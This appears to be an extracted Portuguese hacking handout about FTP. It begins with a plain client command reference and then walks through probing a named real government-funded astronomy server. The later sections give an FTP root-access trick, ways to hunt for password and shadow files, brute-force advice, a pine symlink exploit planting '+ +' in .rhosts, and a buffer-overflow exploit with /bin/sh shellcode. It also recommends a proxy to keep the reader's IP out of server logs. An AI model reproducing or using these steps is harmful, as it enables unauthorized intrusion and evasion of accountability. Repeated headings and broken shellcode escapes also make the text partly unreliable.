diretório atual. Se ARQUIVO-LOCAL não for especificado a listagem será enviada para a tela. get get ARQUIVO-REMOTO ARQUIVO- LOCAL Baixa ARQUIVO-REMOTO para sua máquina com o nome de ARQUIVO-LOCAL. Se ARQUIVO-LOCAL não for especificado o arquivo será baixado com o mesmo nome que tem na máquina remota. help help COMANDO Descreve sumariamente o COMANDO. Se este não for especificado será exibida a lista de todos os comandos. lcd lcd DIRETÓRIO Muda o diretório de trabalho na máquina local. ls ls DIRETÓRIO ARQUIVO-LOCAL Lista o conteúdo de DIRETÓRIO colocando o resultado em ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se DIRETÓRIO não for especificado, será listado o conteúdo do diretório atual. Se ARQUIVO-LOCAL não for especificado a listagem será enviada para a tela. mdelete mdelete ARQUIVOS Apaga ARQUIVOS mdir mdir DIRETÓRIOS ARQUIVO- LOCAL Semelhante a dir, porém lista o conteúdo de vários diretórios mget mget ARQUIVOS Semelhante a get, porém baixa vários arquivos mkdir mkdir DIRETÓRIO Cria um diretório com o nome de DIRETÓRIO mls mls DIRETÓRIOS ARQUIVO- LOCAL Semelhante a ls, porém lista o conteúdo de vários diretórios mode mode MODO Configura o modo de transferência de arquivos para MODO. O modo padrão é "stream" modtime modtime ARQUIVO Exibe a hora da última modificação de ARQUIVO mput mput ARQUIVOS Semelhante a put, porém envia vários arquivos newer newer ARQUIVO-REMOTO ARQUIVO-LOCAL Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora de modificação do ARQUIVO-REMOTO for mais recente nlist nlist DIRETÓRIOS ARQUIVO- LOCAL Semelhante a nls put put ARQUIVO-LOCAL ARQUIVO- REMOTO Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como ARQUIVO-REMOTO. Se ARQUIVO-REMOTO não for especificado o arquivo será enviado com o nome de ARQUIVO- LOCAL pwd pwd Exibe o caminho completo(PATH) do diretório atual quit quit Semelhante a bye recv recv ARQUIVO-REMOTO Semelhante a get
  • 6. ARQUIVO-LOCAL reget reget ARQUIVO-REMOTO ARQUIVO-LOCAL Semelhante a get com a diferença que se ARQUIVO-LOCAL existe e é menor que ARQUIVO-REMOTO, reget considera que ARQUIVO-LOCAL é ARQUIVO-REMOTO parcialmente transferido e contiua a transferência do arquivo. Muito útil quando se baixa arquivos grandes. remotehelp rhelp remotehelp COMANDO rhelp COMANDO Semelhante a help, porém solicita ajuda ao servidor ftp remotestatus rstatus remotestatus ARQUIVO rstatus ARQUIVO Exibe a situação de ARQUIVO. Se ARQUIVO não for especificado, exibe a situação da máquina remota. rename rename NOME-ANTIGO NOME- NOVO Renomeia um arquivo rmdir rmdir DIRETÓRIO Apaga DIRETÓRIO send send ARQUIVO-LOCAL ARQUIVO- REMOTO Semelhante a put size size ARQUIVO Exibe o tamanho de ARQUIVO status status Exibe a situação atual do servidor ftp system system Exibe o tipo de sistema operacional da máquina remota type type TIPO Configura o tipo de transferência de arquivos para TIPO. O padrão é ASCII. Se TIPO não for especificado, será mostrada a configuração atual ? ? COMANDO Semelhante a help Tradução de nomes de arquivos A sintaxe dos nomes dos arquivos pode ser incompatível entre diferentes Sistemas Operacionais. O UNIX usa 128 caracteres, maiúsculas e minúsculas, enquanto que o DOS usa 8 + 3 caracteres e apenas maiúsculas. Certos nomes não podem ser usados em alguns sistemas. Devido a isto tudo o BSD ftp define regras para a tradução de nomes. Mensagens FTP O FTP permite dois modos de transferência de mensagens FTP: texto (com traduções apropriadas) ou binário (sem tradução). Cada mensagem do servidor inclui um identificador decimal de 3 dígitos (exemplo: 226 Transfer complete). Estas mensagens podem ser vistas ou não, usando para isso o modo verbose ou quiet, respectivamente.
  • 7. SERVIDOR ALVO Antes de tudo quero deixar claro que isto não é uma invasão ilegal, o servidor possui suas proteções, mas adiante vocês vão perceber. Vamos ver passo a passo como chegar até os arquivos de dentro do servidor. Site alvo: http://ned.ipac.caltech.edu/ É uma base de dados do Governo Americano coordenada pelo Instituto de tecnologia da Califórnia que fornece dados físicos e bibliográficos (coordenadas, parâmetros astronômicos e posição num mapa estelar) para NASA. É um laboratório de dados extragalácticos.
  • 8. Visualizando o servidor FTP com Proxy Agora vamos “exploitar” o site com um Exploiter on line: http://www.webexploiter.com 1º) Pegar o IP do site Abra o webexploiter e vai em ping, vamos pingar o servidor. Escolha a opção http delete o “www” e digite apenas: ned.ipac.caltech.edu como nesta imagem: Clique em “ping it” Pronto agora temos o IP do servidor: Observe que a resposta do Ping vem com o IP: 134.4.10.118 2º) Procurando Portas abertas no Servidor: Neste mesmo exploiter vamos fazer um scan de portas no IP que a gente pegou. Basta ir em PORT SCAN, selecionar todas as portas e colar o IP: Depois clique em SCAN Observe que o servidor responde nas portas 80 e 21
  • 9. A porta 21 por padrão é a porta de FTP 3º) Visualizando o FTP de uma forma Segura: Agora sabendo que a porta 21 esta aberta, podemos conectar no FTP Este mesmo exploiter possibilita que você veja arquivos em FTPs que permitem login anônimo: Basta clicar em FTP > Visualize FTP (login anônimo) Colar o IP Clique em START Observe: Ai está os diretórios do FTP Você pode navegar e baixar o que você quiser, têm estudos de galáxias, dados do telescópio hubble. Como da para perceber é server UNIX. Os arquivos ai rodam no linux mas da para visualizar no windows sem problema. Arquivos “.gz” são arquivos compactados o Winzip e o Winrar descompacta no windows. Arquivos “.dat” é só renomear para “.txt” que você verá os dados. Apesar do FTP estar permitindo login anônimo a NASA não fez isto para todo mundo ficar mexendo, eles deixaram um banner dizendo que se você não tem autorização pra entrar no FTP é para desconectar: “If you are not authorized to access this system, disconnect now.” Procure na pasta “msgs” que você vai localizar o banner.txt
  • 10. Vantagem de visializar FTP primeiro no Webexploiter. É mais prático e você protege seu IP do log do servidor. Observe que neste servidor da nasa os IPs de quem loga fica registrado, se você deletar algum arquivo, é crime. Eu não sei se este é o LOG deles, mas pode ter certeza que o servidor tem um. Quando você entra com o Webexploiter você conecta via Proxy. O seu IP passa a ser: 67.15.221.2 Olhe da onde é este IP: City: Houston State: TX Country: US Postal code: 77060 Area code: 281 Lá no Texas, bem longe da sua casa. Alem do FTP, o Ping e o Port Scan não partem de seu computador. Da para você vasculhar o servidor no anonimato. Mas ele é apenas um Scan, não é um site de invasão, depois de scanear se você quiser invadir pra valer ai é outra historia.
  • 11. Visualizando os arquivos do FTP diretamente de seu computador Eu não vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um login de UNIX que funciona, mas tem permissão restrita. A gente já tem todos os dados necessários, mas vou fazer tudo dinovo passo a passo pelo Prompt de Comando. 1º) Pegar o IP com o Ping ping ned.ipac.caltech.edu 2º) Verificar se a porta 21 (FTP) está aberta. Vamos usar o Telnet (no Ruindows XP, o vista não tem) Digite: telnet o 134.4.10.118 21 Você vai verificar que existe conexão e que agora as coisas ficam um pouco mais sérias, olhe a mensagem: Digite quit duas vazes e saia do telnet 4º) Logando no FTP Agora sabendo que a porta de FTP esta aberta, vamos entrar no programa de FTP do Ruindows. Basta digitar FTP e dar enter -agora vamos logar, digite: o 134.4.10.118 Note que o servidor manda uma mensagem dizendo que o computador pertence ao Governo Americano, é operado pelo instituto de tecnologia da califórnia e se você não tem autorização para estar ali é para desconectar agora. E depois pede o usuário
  • 12. Aperte enter, vai dar falha de logon, mas tudo bem Agora digite: quote user ftp Observe, ele aceita este usuário e pede o Password Agora digite: quote pass ftp Olha que bunito xD, você esta dentro do servidor da NASA.
  • 13. Definindo um diretório local Primeiramente teremos que definir um diretório local (em nosso computador) para o programa de FTP baixar e enviar os arquivos. -Crie uma pasta no seu desktop (eu criei a pasta “rox”) Agora vamos definir este diretório como diretório local. Use o comando lcd Agora digite lcd Desktop lcd rox Pronto agora nossa pasta de trabalho é a pasta “rox” Listando Diretorios Primeiro vamos usar o comando dir Apesar de ser um servidor UNIX o dir vai funcionar porque é um comando de seu programa de FTP do windows. Agora temos a lista dos diretórios do servidor. bin dev etc msgs pub usr Também podemos usar o comando ls
  • 14. Abrindo diretórios e listando arquivos Para abrir um diretório vamos usar o comando cd Exemplo: vamos abrir o diretório “pub” O comando será: cd pub Observe que aparece a lista de todos os arquivos e diretórios que contem no diretório “pub” Para voltarmos um diretório acima vamos usar o comando c .. Não é c.. como no DOS, é c .. “C(espaço)..” Digite c .. e depois ls Observe que agora voltamos para o diretório anterior. Procurando arquivos ocultos O legal de usar comandos ao invés de programas prontos são as opções que você tem de manipular um arquivo ou diretório, este é um exemplo. Este servidor é UNIX, em UNIX qualquer arquivo que começa com um “.” (ponto) É um arquivo oculto. Este arquivo é invisível a primeira vista. E se esta oculto deve ser por algum motivo.
  • 15. Vamos analisar o diretório “pub” novamente. cd pub ls Agora digite o comando ls –la Observe a diferença na lista de arquivos Baixando arquivos do servidor Já que estamos no diretório “pub” vamos baixar um arquivo deste diretório. Primeiro vamos conferir nosso diretório local: comando lcd Agora vamos usar o comando get para baixar o arquivo. Importante: não aparecerá nenhuma caixa de download e nenhuma barra de tempo. Dependendo do tamanho do arquivo, vai demorar para baixar. Vamos baixar o arquivo lisa.txt Basta digitar: get lisa.txt Espere um pouco e abra a pasta “rox” que você criou no desktop. Vamos baixar um arquivo oculto, o .dat.gz get .dat.gz Você pode baixar todos os arquivos que você conseguir listar. Se quando você ler esta apostila os arquivos “lisa.txt e “.dat.gz” não mais existirem tente baixar outros.
  • 16. Olhe os arquivos que nos baixamos do servidor na pasta “rox” Enviando arquivo para o servidor O comando para enviar um arquivo é o comando put Vamos tentar enviar um arquivo para o diretório pub Coloque qualquer arquivo no diretório local (no nosso caso a pasta “rox”) Vou colocar um arquivo qualquer.. . Lamer_list.doc É um arquivo do Word Agora vamos tentar enviar este arquivo para o servidor, basta digitar: put Lamer_list.doc Observe: O servidor não aceitou, isto significa que o nível do seu usuário não permite “UPAR” nada para aquele diretório. Tente em outro diretório, mas acredito que com logim anônimo você não vai conseguir. Só com outro login.
  • 17. Visualizando o arquivo do Banner Lembra da mensagem do servidor? Esta aqui: Vamos traduzir: *------------------------------------------------------------------------ * Este computador é financiado pelo Governo dos Estados Unidos * E operado pelo California Institute of Technology * De apoio ao curso U.S. Government programas e atividades. * Ao continuar, você concorda com os dados que voce digitar * Sendo monitorado. Os usuários deste sistema não têm nenhuma expectativa de * Privacidade. * Se você não está autorizado a acessar a este sistema, desconecte agora. *------------------------------------------------------------------------ Vamos achar o arquivo desta mensagem. É um arquivo de texto. Volte para o inicio cd .. Agora liste ls Entre no diretório msgs cd msgs liste este diretório ls Observe na imagem o arquivo banner.txt Agora vamos baixar este arquivo get banner.txt
  • 18. Agora observe nossa pasta “rox” Abra o arquivo banner.txt Surpresa: Você deve estar pensando: Então eu vou deletar este arquivo no servidor e colocar outro com minha mensagem no lugar dele. Isto é o famoso Banner Grabbing. O comando para deletar é o del E o comando para enviar arquivo é o put Mas as coisas não são tão simples assim, você esta logado como anônimo e sua permissão neste diretório é este. drwxr-xr-x você esta no terceiro grupo “xr-“ Ai não tem nenhum “w” significa que você só pode ler o arquivo e não pode gravar nada. Com login anônimo sem chance, você terá que pegar alguma senha e logar. Tem mais arquivos de banner ai, baixe eles e olhe. Analisando os arquivos Eu analisei os arquivos do servidor e não achei nada de interessante. Só tem dados de satélite, telescópio estudos de física. Se fosse na guerra fria até dava para vender para União Soviética rsrs. Mas da para estudar e estrutura de diretórios e arquivos UNIX Olhem as extensões que mais aparecem.
  • 19. .dat dat é uma abreviação de data (dados), este arquivo contem dados, neste caso dados de telescópio, satélite,sei la. Eu renomei um deles para .txt , tinha isto: File Name: .dat, Processing Time: Thu Feb 8 04:30:00 Output option: compact_2 ************************** SEARCH REQUESTS ****************************** IN_CSYS : equatorial , IN_EQUINOX : J2000.0 OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0 EXTENDED_NAME_SEARCH: Yes SORTED_BY_FIELD : Distance_to_search_center REDSHIFT_VELOCITY : 10000.0 DEFAULT_RADIUS : 1.000000 DEFAULT_BEGIN_YEAR : 1900 DEFAULT_END_YEAR : 2006 IAU NAME STYLE : S NEARPOSN: 1.4514872000d ; 54.55719600 ; 1.00 Much care has gone into the collection of POSITIONS and VELOCITIES in NED, and they are carried along with uncertainties and references to their origin. These are continually over-written by more accurate values as they become available. The other "Basic Data", however -- diameters, magnitudes, flux densities, cluster populations, etc -- are indicative values only, in the sense that they originate in many different sources, and have not been placed on a uniform scale. The main sources are catalogs and compilations, with the more accurate data sets favored, and the larger ones favored at comparable accuracy. No information is kept about the origin of "Basic Data". More controlled and rigorous data collection is applied to PHOTOMETRIC DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried along with their uncertainties, references to their origin, and some information about the data collection and processing behind them. Unlike basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or updated, but should serve as a cumulative record of the measurements on each object. As a future enhancement to NED, additional data frames along the same lines will be introduced for kinematics, classifications, and other parameters. A. Galaxies (G) Field 1: Morphology Field 2: A magnitude in the visible range, on any scale as available Field 3: Major axis diameter in arcmin Field 4: Minor axis diameter in arcmin .gz (arquivo compactado, o winzip do windows consegue descompactar) .txt (arquivo de texto ...) .c (são scripts, muito interessante) Restrições Quando logamos apareceu a mensagem: (restrições aplicadas) E quando digitamos dir apareceu isto.
  • 20. d x w são códigos de permissão para cada diretório, mas adiante eu explicarei o que significa cada código. Isto significa que não temos acesso a tudo dentro do servidor, agora você percebeu que entrar anônimo, não significa burlar uma senha, mas sim entrar como um usuário com um nível baixo e cheio de restrições. Mas, uma vês lá dentro, você pode procurar por arquivos e dados que te levam a senha do root ou à outros usuários. ENVIANDO COMANDOS DIRETAMENTE PARA O SERVIDOR Até agora fizemos um monte de comando, testes e tudo mais. Você deve estar se perguntando: Mas eu já enviei um monte de comandos? Sim, você enviou, mas não diretamente, você usou o programa cliente de ftp. Existe uma diferença em usar um programa de FTP e enviar comandos diretamente para o servidor. O programa de FTP do windows ou do Linux apenas interpreta estes comandos padronizados para FTP e envia para o servidor.Enviar um comando diretamente para o servidor é diferente. Vamos ver na pratica: Digite help Você vai visualizar o help do seu programa de FTP e todos os comandos que o seu programa de FTP interpreta. No nosso caso nosso servidor é um UNIX e ele interpreta mais comandos do que apenas estes de nosso programa de FTP. O programa de FTP do windows tem uma espécie de “filtro” que envia uma linha de comando diretamente para o servidor, este “filtro” é o comando quote ou o comando literal Agora digite quote help Observe que aparece um monte de comandos diferentes que o servidor interpreta, mas estes comandos não são interpretados pelo seu programa de FTP. IMAGEM Existe Duas formas de enviar um comando diretamente para o servidor: usando o comando quote ou conectando via telnet. Vamos usar o programa de FTP mesmo ENTENDENDO OS COMANDOS O protocolo FTP se baseia em comandos e respostas. Para enviar um comando basta enviar um texto pela conexão de controle (no nosso caso o nosso computador) seguido por uma nova linha (“Line Feed” ASCII 10 - 0x0A) Após o “Line Feed ASCII 10 - 0x0A” o servidor executará o comando e dará uma resposta. Formato da resposta: 220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A> 220 (código de retorno) ASCII 32 - 0x20 (espaço em branco) ASCII 10 - 0x0A (uma linha nova) Se a resposta ocupar mais de uma linha o formato seguira o mesmo padrão. 220-<Espaço>Resposta (Linha 1)<LineFeed> 220-<Espaço>Resposta (Linha 2)<LineFeed> Neste formato, todas as linhas, com exceção da última, possuem um hífen (ASCII 45 - 0x2D) imediatamente após o código de retorno, exceto a última, que não possui hífen justamente para sinalizar que é a última linha da resposta. Então enquanto não aparecer o hífen deve-se aguardar o termino da resposta
  • 21. LOGANDO no SISTEMA Os comandos são simples user (para usuário) e (pass para senha) Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos diretamente para o servidor utilizando o comando quote quote user seuusuario quote pass suasenha Se você não souber nenhuma senha tente anônimo quote user anonymous quote pass rackerox@ned.ipac.... Você também pode tentar explorar uma falha antiga, mas só funciona com servidores antigos.quando aparecer para logar digite isto: quote user ftp depois quote cwd ~root ou quote cwd~sys quote cwd~sysop depois quote pass ftp O comando cwd (Change Working Directory) é usado orinalmente para abrir um diretório, neste caso ele iria abrir ~root ,se isto acontecer Voce estará com privilégios root, você pode fazer o que quiser no servidor, terá permissão para tudo, inclusive para ser preso =) SISTEMA OPERACIONAL Agora que já estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar o comando syst , como é um comando direto vamos usar quote syst Agora sabemos que é UNIX CONEXÃO DE DADOS Existem comandos que precisam de uma conexão de dados estabelecida, por exemplo, se for baixar algum arquivo do servidor é necessário estabelecer portas do computador para isto. O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando direto ao servidor teremos que estabelecer quais serão as portas que iremos usar. Vamos usar o comando port O “port” indica ao servidor quais portas serão usadas na conexão Neste comando, deve-se passar 6 valores separados pro vírgula. Os 4 primeiros são os dígitos do IP. Os outros dois valores representam a porta TCP em que será feita a conexão.para definir a porta é um pouquinho complicado, você terá que separar os dois bytes que compõem o valor da porta e convertê-los para decimal.Exemplo: Xxxxx Exemplo do comando port Você também pode deixar o servidor especificar qual porta será utilizada, eu acho bem melhor, ai você não corre o risco de especificar uma porta que já esta sendo utilizada.Para isto use o comando pasv
  • 22. Os bytes retornados nos parênteses são: os quatros primeiros são o IP, os outros dois são a porta. Para obter o número da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo. Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201). PRINCIPAIS COMANDOS que utilizam Conexão de Dados quote list (lista os arquivos do diretório atual no servidor) quote stor (Envia um arquivo para o servidor) quote retr (Faz o download de um arquivo do servidor) HELP Cuidado para não se confundir com o help, este comando lista todos os comandos do servidor, mas se você digita apenas help você terá os comandos do seu programa de FTP, para ver os comandos do servidor digite quote help Comando help (help do programa de FTP) Comando quote help (help do servidor)
  • 23. FTP via TELNETFTP via TELNETFTP via TELNETFTP via TELNET Também podemos conectar um cliente Telnet na porta do FTP. Primeiro vamos abrir nosso cliente Telnet, abra o prompt de comando novamente e digite telnet (isto no windows XP, no vista você terá que baixar um cliente) Depois que você apertar enter abrira o cliente de telnet do Windows. Agora vamos abrir uma conexão com o servidor. Vamos usar o comando open : open ipdoservidor portadeconexao Exemplo: vamos abrir uma conexão com o IP 134.4.10.118 na porta 21 Lembrando que a porta padrão para FTP é a porta 21. O comando fica assim: open 134.4.10.118 21 depois de conectado vamos logar no servidor, usando comando user Se voce souber algum user e senha logue com ele, se não tente logar anônino User anonymous Se o servidor aceitar ele vai pedir para você completar com o passwd ou seu email, agora você usa o comando pass Mas no servidor não existe passwd para anonymous então você pode inventar um endereço de email usando o domínio do servidor. Resumindo: user anonymous pass rackerox@ipac.caltech.edu Depois só voce apertar enter que você estará logado, observe a imagem. Agora digite help Vai aparecer uma lista de comandos. Esta lista de comandos não é do seu cliente de telnet, mas sim do servidor que você esta acessando.
  • 24. Observe que tem a assinatura do root: root@rad.ipac.caltech.edu Via telnet você terá uma conexão direta com o servidor, isto significa que você não precisa mais do quote, e também que aqueles comandos do programa de FTP não funcionará aqui. Aqui só vão funcionar os comandos do servidor. Para encerrar a conexão, basta digitar quit
  • 25. Conexão de rede via FTPConexão de rede via FTPConexão de rede via FTPConexão de rede via FTP Podemos visualizar e manipular arquivos de um servidor FTP dentro do windows como se o arquivo estivesse no nosso computador. Observe a imagem, aparece as pastas no explorer, você pode copiar, colar, recortar... Para criar a conexão: - Clique em Iniciar > Configurações > Painel de Controle > Conexões de Rede. - Em outros locais (coluna à esquerda) entre em Meus Locais de Rede - Depois clique em Adicionar local de Rede - Agora é só ir seguindo as etapas. - Coloque o IP ou o endereço do servidor de FTP A vantagem de usar FTP desta forma é que fica bem mais simples e intuitivo. Mas a grande Desvantagem é que você não terá as varias opções de comandos que existe no prompt, você está limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, você nem saberá.
  • 26. FTP UNIX A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX. Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP USUÁRIOS Root = super usuário ( poder realizar todas as funções sem restrição ) Cada usuário é classificado com um número, de 0 a FFFF-1 (65534). O numero 0 é designado para o Root e o 65534 para Ananymous De 0 a 100 são de superusuários (bin, adm, user, admin, guest, etc), se o servidor for pequeno o root e estes outros superusários são a mesma pessoa. NAVEGAÇÃO Importante em Unix os comandos são Case Sensitive ( diferencia letras maiúsculas e minúsculas ao contrario do MS-DOS) O Unix usa arvore de diretórios igual ao DOS mas a barra é invertida, ( utilize / ao invés de ) ls (mostras os diretórios e arquivos, o ls equivale ao DIR /W) ls –a (mostras arquivos ocultos) ls –la (mostras arquivos ocultos com detalhes) ls –l (mostra as permissões) exemplo: drw-r--r-- root root 10000 1 de abril etc d - directory r - read - so pode ver, dar download, etc... w - write - pode editar, gravar... x - execute - eh um executavel ou um script (tipo .BAT do DOS) Primeiro espaço: mostra se é um diretório ou não. Próximos 3 espaços: o que o proprietário pode fazer com o arquivo Próximos 3 espaços: são do GROUP que pertence o arquivo Últimos 3 espaços: são do USER (o que qualquer usuário pode fazer) Os últimos números são bytes ocupados.
  • 27. PRINCIPAIS COMANDOS cd nomedodiretorio (para mudar de diretório) cd .. (para voltar um diretório) pwd (para ver em que diretório você esta) mkdir nomedodiretorio (para criar um diretório) rm arquivo (remover um arquivo, irá pedir confirmação y ou n ) cp arquivooriginal novalocalizaçao (copiar um arquivo) cat (mostra o conteúdo de um arquivo equivale ao type do DOS) who ( mostra quem está conectado no server, para mandar uma mensagem utilize write nomedouser) get nomedoarquivo (faz download do arquivo) cc arquivo (compila um arquivo) gcc arquivo monedoprograma ( compila um arquivo como o cc) MODIFICANDO AS PERMISSÕES chmod muda as permissões, exemplo: ls -l teste.txt -rw-r--r-- LoKi LoKi 34 teste.txt chmod g+w teste.txt ---> muda o acesso do Group para +write ls -l teste.txt -rw-rw-r-- LoKi LoKi 34 teste.txt chmod a-r teste.txt ---> muda o acesso de All para -read ls -l teste.txt --w--w---- LoKi LoKi 34 teste.txt chmod u+w teste.txt ---> muda o acesso de User para +write ls -l teste.txt --w--w--w- LoKi LoKi 34 teste.txt resumindo: o - para Owner g - para o Grupo u - para todos Usuários Importante: somente o root ou o proprietário pode usar o chmod.
  • 28. Mais comandos chown, muda o OWNER (proprietário) de algum arquivo, isso se você for o OWNER atual. Use chown novodono nomedoarquivo chgrp, muda o grupo a que pertence o arquivo. Use chgrp novogrupo nomedoarquivo PRICIPAIS DIRETORIOS /etc/passwd Neste diretório estão contidos: Usuários, Senhas , Ids Abra o arquivo passwd, dependendo da sua permissão aparecera: root:*:0:1:system PRIVILEGED account:/:/bin/sh anonymous:*Nologin:65534:65534:anonymous NFS user:/: ou zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh (username:Password:id:uid:mini descrição:diretório de trabalho:'command.com') Se você conseguir abrir o arquivo passwd você verá que o anonymous não tem senha (por isso você pode logar anônimo com qualquer password) Se você perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu, entre logado com ele. Mas se a senha esta ai, porque não entrar com ela agora? Respostas, as senhas estão criptografadas, mas adiante veremos como decriptografar. Talves quando você abra o arquivo passwd pode aparecer isto: root:*:0:1:system PRIVILEGED account:/:/bin/sh anonymous:*Nologin:65534:65534:anonymous NFS user:/: nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/: daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh ftp::12:15:Anonymous FTP:/tmp:/bin/sh Observe que no lugar das senhas dos usuários aparece um asterisco “*” , isto significa que as senhas estão em um outro lugar. Normalmente em /etc/shadow, e as vezes ela esta -r (No read) para os Users normais. Agora é hora de trabalhar, se as senhas estão (no read) teremos que achar uma forma de vê-las. O senha do root aparece com um asterisco por causa do shadow mas o shadow esta “r” para você. Normalmente /etc/shadow está escondido como /etc/.shadow Diretórios que começam com ponto “.” São diretórios ocultos. Se o .shadow não estiver na diretório etc, você precisa procurar e o arquivo passwd pode estar com outro nome. /etc/shadow/etc/shadow/etc/shadow/etc/shadow podem conter senhas como vimos anteriormente /etc/group/etc/group/etc/group/etc/group Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.
  • 29. /usr/adm/loginlog Aqui ficam os Logs, horários de entradas e saídas dos usuários. As vazes podem estar em /usr/adm/acct/loginlog E as vezes nem é encontrado, alguns servidores desativam este serviço. /usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> : Aqui fica o MAIL do usuário, para você ler esse arquivo você tem de ser o root ou o próprio usuário. /upload ou /cache/upload ou /cache/upload ou /cache/upload ou /cache Aqui ficam gravados arquivos temporários que os usuários ou mesmo o ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou a cada semana. Em muitos servers nao existe esse diretório. /bin :/bin :/bin :/bin : Neste diretório ficam os comandos do server e as shells. Cuidado. SENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITS Login anônimo user: anonymous pass: eu@dominio Logar como root (somente em servidores com falha) quote user ftp quote cwd ~root quote pass ftp quote user ftp quote cwd ~sys quote pass ftp quote user ftp quote cwd ~sysop quote pass ftp Diretorio das senhas : (As senhas estarão criptografadas) /etc/passwd .shadow (procure este diretório oculto)
  • 30. Decriptografando uma senha Exemplo de senha criptografada: root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Para decriptografarmos precisaremos de um decripter, pesquisem sobre decrypter passwd ftp Quebrando uma senha de FTP Quando você não pode acessar o arquivo passwd.txt e não consegue a senha criptogafada, significa que a segurança do servidor é muito boa ou você é muito ruim =) Ai só usando os métodos Lamer um deles é o Brute Force. Brute force significa “força bruta” existem vários programas de brute force, o funcionamento é simples, o programa gera inúmeras combinações de senhas até achar uma que logue. Você também pode usar uma “Word list” (uma lista com as senhas mais comuns) junto com o Bute Force. Um exemplo de programa é o Brutus Exploits UNIX Exploiter sem duvida é a melhor forma de hackear um servidor, mas é muito mais complicado, é impossível você entender um exploiter se você não souber programar. Um exploit é um programa que você cria e faz ele rodar dentro do servidor exploranda falhas e te levando á root. Eu achei um ótimo exemplo de exploit que roda via telnet, é o PINE EXPLOIT Vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox. Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile. hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
  • 31. catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eaxn"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f" /* 16 bytes */ "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52" /* 16 bytes */ "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01" /* 20 bytes */ "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1);
